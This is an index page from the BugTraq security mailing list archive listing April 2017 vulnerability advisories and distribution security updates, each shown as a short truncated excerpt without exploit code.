BugTraq Mode:
(Page 1 of 1712)  1 2 3 4 5 6 7 8 9 10 11  Next >
CVE-2017-7192: Starscream library before 2.0.4 allows SSL pinning bypass 2017-04-21
Security Advisories (security advisories centralway com)
Product: Starscream websocket library
Severity: LOW
CVE Reference: CVE-2017-7192
Type: SSL Pinning bypass / Information disclosure

Abstract
--------

WebSocket.swift in Starscream before 2.0.4 allows an SSL Pinning
bypass because of incorrect management of the certValidated variable
(it can be set

[ more ]  [ reply ]
[SECURITY] [DSA 3831-1] firefox-esr security update 2017-04-19
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-3831-1 security (at) debian (dot) org [email concealed]
https://www.debian.org/security/ Moritz Muehlenhoff
April 20, 2017

[ more ]  [ reply ]
[HITB-Announce] HITB GSEC 2017 CFP Closes April 30th 2017-04-19
Hafez Kamal (aphesz hackinthebox org)
FINAL CALL!

CFP for the 3nd annual Hack In The Box GSEC conference in Singapore
closes on the 30th of April!

Call for Papers: http://gsec.hitb.org/cfp/
Event Website: http://gsec.hitb.org/sg2017/

HITB GSEC is a 2-day deep knowledge security conference where attendees
get to vote on the final agen

[ more ]  [ reply ]
October CMS v1.0.412 several vulnerabilities 2017-04-19
Anti Räis (antirais gmail com)
October CMS v1.0.412 several vulnerabilities
############################################

Information
===========

Name: October CMS v1.0.412 (build 412)
Homepage: http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be auth

[ more ]  [ reply ]
DefenseCode ThunderScan SAST Advisory: Ultimate Form Builder Cross-Site Scripting (XSS) Vulnerability 2017-04-19
DefenseCode (defensecode defensecode com)

DefenseCode ThunderScan SAST Advisory
Ultimate Form Builder
Cross-Site Scripting (XSS) Vulnerability

Advisory ID: DC-2017-01-027
Software: Ultimate Form Builder WordPress plugin
Software Language: PHP
Version: Various
Vendor Status: Vendor contacted
Rele

[ more ]  [ reply ]
CVE-2017-7220. OpenText Documentum Content Server: privilege evaluation using crafted RPC save-commands. 2017-04-19
Andrey B. Panfilov (andrew panfilov tel)
CVE Identifier: CVE-2017-7220
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC:

https://gist.github.com/andreybpanfilov/d879248

[ more ]  [ reply ]
CVE-2017-7692: Squirrelmail 1.4.22 Remote Code Execution 2017-04-19
Filippo Cavallarin (filippo cavallarin wearesegment com)
Advisory ID: SGMA17-001
Title: Squirrelmail Remote Code Execution
Product: Squirrelmail
Version: 1.4.22 and probably prior
Vendor: squirrelmail.org
Type: Command Injection
Risk level: 4 / 5
Credit:

[ more ]  [ reply ]
[slackware-security] minicom (SSA:2017-108-01) 2017-04-19
Slackware Security Team (security slackware com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security] minicom (SSA:2017-108-01)

New minicom packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,
14.2, and -current to fix a security issue.

Here are the details from the Slackware 14.2 ChangeLog:
+--------------------

[ more ]  [ reply ]
CVE-2017-7615 Mantis Bug Tracker v1.3.0 / 2.3.0 Pre-Auth Remote Password Reset 2017-04-18
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-R
EMOTE-PASSWORD-RESET.txt
[+] ISR: ApparitionSec

Vendor:
================
www.mantisbt.org

Product:
==================

[ more ]  [ reply ]
[CVE-2017-5661] Apache XML Graphics FOP information disclosure vulnerability 2017-04-18
Simon Steiner (simonsteiner1984 gmail com)
CVE-2017-5661:
Apache XML Graphics FOP information disclosure vulnerability

Severity:
Medium

Vendor:
The Apache Software Foundation

Versions Affected:
FOP 1.0 - 2.1

Description:
Files lying on the filesystem of the server which uses batik can
be re

[ more ]  [ reply ]
[ANNOUNCE] HPACK Bomb Attack vulnerability in ATS - CVE-2016-5396 2017-04-17
Bryan Call (bcall apache org)
There is a vulnerability in ATS with the HPACK Bomb Attack that can lead to a DoS. Versions 6.0.0 to 6.2.0 are affected. Please upgrade to ATS 6.2.1 or 7.0.0.

Downloads:
https://trafficserver.apache.org/downloads

Jira Ticket:
ttps://issues.apache.org/jira/browse/TS-5019

CVE
https://www.cve.m

[ more ]  [ reply ]
Watchguard Fireware XXE DoS & User Enumeration 2017-04-17
David Fernandez (david fdmv gmail com)
Watchguardâ??s Firebox and XTM are a series of enterprise grade network
security appliances providing advanced security services like next
generation firewall, intrusion prevention, malware detection and
blockage and others. Two vulnerabilities were discovered affecting the
XML-RPC interface of the

[ more ]  [ reply ]
concrete5 v8.1.0 Host Header Injection 2017-04-14
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-
INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
==================
www.concrete5.org

Product:
================
concrete5

[ more ]  [ reply ]
[slackware-security] bind (SSA:2017-103-01) 2017-04-13
Slackware Security Team (security slackware com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security] bind (SSA:2017-103-01)

New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,
14.2, and -current to fix security issues.

Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+

[ more ]  [ reply ]
[security bulletin] HPESBGN03728 rev.1 - HPE Operations Agent using OpenSSL, Remote Denial of Service (DoS), Unauthorized Access to Data 2017-04-13
security-alert hpe com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Note: the current version of the following document is available here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn
03728en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbgn03728en_us

Version: 1

HP

[ more ]  [ reply ]
[SYSS-2017-009] agorum core Pro - Improper Restriction of XML External Entity Reference ('XXE') 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-009
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Improper Restriction of XML External Entity Reference ('XXE') (CWE-611)
Risk Le

[ more ]  [ reply ]
[SYSS-2017-008] agorum core Pro - Cross-Site Request Forgery 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-008
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
Risk Level: Medium
Solution Status: Open
M

[ more ]  [ reply ]
[SYSS-2017-007] agorum core Pro - Cross-Site Scripting 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-007
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Open
Manufactu

[ more ]  [ reply ]
[SYSS-2017-006] agorum core Pro - Insecure Direct Object Reference 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-006
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Insecure Direct Object Reference (CWE-932)
Risk Level: High
Solution Status: Ope

[ more ]  [ reply ]
[SYSS-2017-005] agorum core Pro - Persistent Cross-Site Scripting 2017-04-13
erlijn vangenuchten syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2017-005
Product: agorum core Pro
Manufacturer: agorum Software GmbH
Affected Version(s): 7.8.1.4-251
Tested Version(s): 7.8.1.4-251
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: High
Solution Status: Open

[ more ]  [ reply ]
April 2017 - HipChat Server Advisory 2017-04-13
Matthew Hart (mhart atlassian com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CVE ID:

* CVE-2017-7357.

Product: Hipchat Server.

Affected Hipchat Server product versions:
All versions < 2.2.3

Fixed Hipchat Server product versions:
2.2.3

Summary:
This advisory discloses a critical severity security vulnerability
that was

[ more ]  [ reply ]
DefenseCode Security Advisory: Magento 0day Arbitrary File Upload Vulnerability (Remote Code Execution, CSRF) 2017-04-12
DefenseCode (defensecode defensecode com)

DefenseCode Security Advisory
Magento 0day Arbitrary File Upload Vulnerability
(Remote Code Execution, CSRF)

Advisory ID: DC-2017-04-003
Software: Magento CE
Software Language: PHP
Version: 2.1.6 and below
Vendor Status: Vendor contacted / Not fixed
Release Date:

[ more ]  [ reply ]
CVE-2017-7456 Moxa MXview v2.8 Denial Of Service 2017-04-12
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SE
RVICE.txt
[+] ISR: ApparitionSec

Vendor:
============
www.moxa.com

Product:
===========
MXView v2.8

Download:
http://ww

[ more ]  [ reply ]
CVE-2017-7455 Moxa MXview v2.8 Remote Private Key Disclosure 2017-04-12
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-REMOTE-PRIVA
TE-KEY-DISCLOSURE.txt
[+] ISR: APPARITIONSEC

Vendor:
============
www.moxa.com

Product:
===========
MXview V2.8

Downloa

[ more ]  [ reply ]
CVE-2017-7457 Moxa MX AOPC-Server v1.5 XML External Entity Injection 2017-04-12
apparitionsec gmail com (hyp3rlinx)
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-
EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec

Vendor:
============
www.moxa.com

Product:
=======================
MX-AOPC UA

[ more ]  [ reply ]
FreeBSD Security Advisory FreeBSD-SA-17:03.ntp 2017-04-12
FreeBSD Security Advisories (security-advisories freebsd org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

========================================================================
=====
FreeBSD-SA-17:03.ntp Security Advisory
The FreeBSD Project

Topic:

[ more ]  [ reply ]
[SECURITY] [DSA 3829-1] bouncycastle security update 2017-04-11
Moritz Muehlenhoff (jmm debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- ------------------------------------------------------------------------
-
Debian Security Advisory DSA-3829-1 security (at) debian (dot) org [email concealed]
https://www.debian.org/security/ Moritz Muehlenhoff
April 11, 2017

[ more ]  [ reply ]
Microsoft Office OneNote 2007 DLL side loading vulnerability 2017-04-11
Securify B.V. (lists securify nl)
------------------------------------------------------------------------

Microsoft Office OneNote 2007 DLL side loading vulnerability
------------------------------------------------------------------------

Yorick Koster, September 2015

--------------------------------------------------------------

[ more ]  [ reply ]
Multiple local privilege escalation vulnerabilities in Proxifier for Mac 2017-04-11
Securify B.V. (lists securify nl)
------------------------------------------------------------------------

Multiple local privilege escalation vulnerabilities in Proxifier for Mac
------------------------------------------------------------------------

Yorick Koster, April 2017

------------------------------------------------------

[ more ]  [ reply ]
[SECURITY] CVE-2017-5648 Apache Tomcat Information Disclosure 2017-04-10
Mark Thomas (markt apache org)
CVE-2017-5648 Apache Tomcat Information Disclosure

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0.M17
Apache Tomcat 8.5.0 to 8.5.11
Apache Tomcat 8.0.0.RC1 to 8.0.41
Apache Tomcat 7.0.0 to 7.0.75
Apache Tomcat 6.0.x is not affected

Descrip

[ more ]  [ reply ]
(Page 1 of 1712)  1 2 3 4 5 6 7 8 9 10 11  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus